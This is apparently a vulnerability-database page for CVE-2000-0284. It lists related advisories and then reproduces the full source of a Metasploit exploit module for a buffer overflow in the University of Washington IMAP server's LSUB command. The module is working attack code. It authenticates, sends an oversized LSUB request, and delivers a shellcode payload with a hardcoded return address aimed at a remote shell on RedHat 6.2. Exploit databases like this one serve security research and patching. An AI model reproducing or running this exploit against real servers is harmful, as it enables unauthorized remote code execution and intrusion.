| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| UoW imapd (UW-IMAP) v12 Multiple Command Remote Overflows | 20 Aug 200400:00 | – | nessus | |
| UoW imapd (UW-IMAP) v12.264 or v10.24 Multiple Command Remote Overflows. | 20 Aug 200400:00 | – | nessus | |
| UoW imapd (UW-IMAP) Multiple Command Remote Overflows | 1 Mar 200100:00 | – | nessus | |
| UoW imapd (UW-IMAP) Multiple Command Remote Overflows (2) | 18 Apr 200000:00 | – | nessus | |
| CVE-2000-0284 | 26 Mar 201000:00 | – | circl | |
| CVE-2000-0284 | 26 Apr 200004:00 | – | cve | |
| CVE-2000-0284 | 26 Apr 200004:00 | – | cvelist | |
| UoW IMAPd Server - LSUB Buffer Overflow (Metasploit) | 26 Mar 201000:00 | – | exploitdb | |
| University of Washington - imap LSUB Buffer Overflow (Metasploit) | 16 Apr 200000:00 | – | exploitpack | |
| UoW IMAP Server LSUB Buffer Overflow | 6 Jul 200808:27 | – | metasploit |
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Imap
def initialize(info = {})
super(update_info(info,
'Name' => 'UoW IMAP server LSUB Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the 'LSUB'
command of the University of Washington IMAP service.
This vulnerability can only be exploited with a valid username
and password.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2000-0284' ],
[ 'OSVDB', '12037' ],
[ 'BID', '1110' ],
[ 'URL', 'http://www.milw0rm.com/exploits/284' ],
],
'Privileged' => false,
'Payload' =>
{
'Space' => 964,
'BadChars' => "\x00\x0a\x0d",
'StackAdjustment' => -3500,
'Compat' =>
{
'ConnectionType' => '-reverse',
},
},
'Platform' => 'linux',
'Targets' =>
[
['RedHat 6.2 - IMAP4rev1 v12.264', { 'Ret' => 0xbffff310 }],
],
'DisclosureDate' => 'Apr 16 2000',
'DefaultTarget' => 0))
end
def check
connect
disconnect
if (banner =~ /IMAP4rev1 v12.264/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect_login
print_status("Sending overflow string...")
req = "a002 LSUB \"\" {1064}\r\n"
sock.put(req)
sleep(2)
sploit = payload.encoded + rand_text_alphanumeric(64) + [target['Ret']].pack('V') + rand_text_alphanumeric(32) + "\r\n"
sock.put(sploit)
sleep(2)
handler
disconnect
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation